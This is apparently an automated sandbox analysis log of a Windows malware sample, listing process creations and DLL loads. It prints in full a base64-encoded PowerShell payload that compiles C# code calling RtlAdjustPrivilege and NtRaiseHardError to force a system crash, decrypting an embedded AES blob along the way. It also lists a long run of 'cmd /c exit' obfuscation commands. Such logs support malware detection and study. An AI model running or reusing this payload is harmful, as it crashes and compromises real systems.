Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd"" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 97 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 98 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 99 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 100 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 101 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 102 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 103 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 104 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 105 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 106 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 107 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 108 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 109 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 110 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 111 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 112 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 113 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 114 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 115 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 116 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 117 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 118 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 119 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 120 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 121 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 122 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 65 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 66 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 67 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 68 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 69 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 70 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 71 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 72 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 109 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 110 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 111 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 112 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 113 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 114 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 79 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 80 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 81 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 82 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 119 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 100 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 101 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 86 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 104 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 88 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 68 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 69 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 70 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 71 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 50 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 51 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 52 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 53 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 113 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 116 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 117 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 57 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 123 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 98 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 63 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 58 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 46 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 104 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 88 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 68 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 69 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdatauser.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
